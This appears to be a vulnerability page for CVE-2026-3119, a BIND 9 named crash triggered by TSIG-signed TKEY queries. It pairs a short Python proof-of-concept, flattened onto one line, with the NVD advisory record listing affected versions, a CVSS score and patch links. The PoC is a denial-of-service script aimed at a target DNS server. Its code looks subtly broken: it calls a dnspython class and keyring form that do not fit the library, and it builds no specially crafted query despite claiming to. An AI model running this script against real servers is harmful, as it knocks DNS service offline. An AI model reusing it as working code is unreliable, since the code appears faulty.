CVE-2026-3119

import dns.message import dns.tsig import dns.query # PoC for CVE-2026-3119: BIND 9 TKEY Crash # Description: This script sends a signed query with a TKEY record. # Note: Requires a valid TSIG key configured on the target server. target = "192.168.1.100" # Target DNS Server IP key_name = "keyname." key_secret = "SecretKeyValue==" # Base64 secret # Create the TSIG credentials keyring = dns.tsig.HMACTSig(keyring={key_name: key_secret}) # Create a query with a TKEY record # TKEY is usually used for key exchange, here we craft a specific query query = dns.message.make_query('example.com', 'TKEY') query.use_tsig(keyring=keyring) try: # Send the query to the target response = dns.query.udp(query, target, timeout=5) print(f"Response received: {response}") except Exception as e: print(f"Error occurred (Server may have crashed): {e}")

{"cve": {"id": "CVE-2026-3119", "sourceIdentifier": "[email protected]", "published": "2026-03-25T14:16:37.097", "lastModified": "2026-05-21T15:24:39.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under certain conditions, `named` may crash when processing a correctly signed query containing a TKEY record. The affected code can only be reached if an incoming request has a valid transaction signature (TSIG) from a key declared in the `named` configuration.\nThis issue affects BIND 9 versions 9.20.0 through 9.20.20, 9.21.0 through 9.21.19, and 9.20.9-S1 through 9.20.20-S1.\nBIND 9 versions 9.18.0 through 9.18.46 and 9.18.11-S1 through 9.18.46-S1 are NOT affected."}, {"lang": "es", "value": "Bajo ciertas condiciones, 'named' puede colapsar al procesar una consulta correctamente firmada que contiene un registro TKEY. El código afectado solo se puede acceder si una solicitud entrante tiene una firma de transacción (TSIG) válida de una clave declarada en la configuración de 'named'.\nEste problema afecta a las versiones de BIND 9 9.20.0 a 9.20.20, 9.21.0 a 9.21.19, y 9.20.9-S1 a 9.20.20-S1.\nLas versiones de BIND 9 9.18.0 a 9.18.46 y 9.18.11-S1 a 9.18.46-S1 NO están afectadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.20.0", "versionEndExcluding": "9.20.21", "matchCriteriaId": "2C0EF5D0-68A6-4E00-985B-523D9B243E49"}, {"vulnerable": true, "criteria": "cpe:2.3:a:isc:bind:*:*:*:*:-:*:*:*", "versionStartIncluding": "9.21.0", "versionEndExcluding": "9.21.20", "matchCriteriaId": "B1DD0950-5CBD-49B2-8007-5E96B3C4FB1B"}]}]}], "references": [{"url": "https://downloads.isc.org/isc/bind9/9.20.21", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://downloads.isc.org/isc/bind9/9.21.20", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://kb.isc.org/docs/cve-2026-3119", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}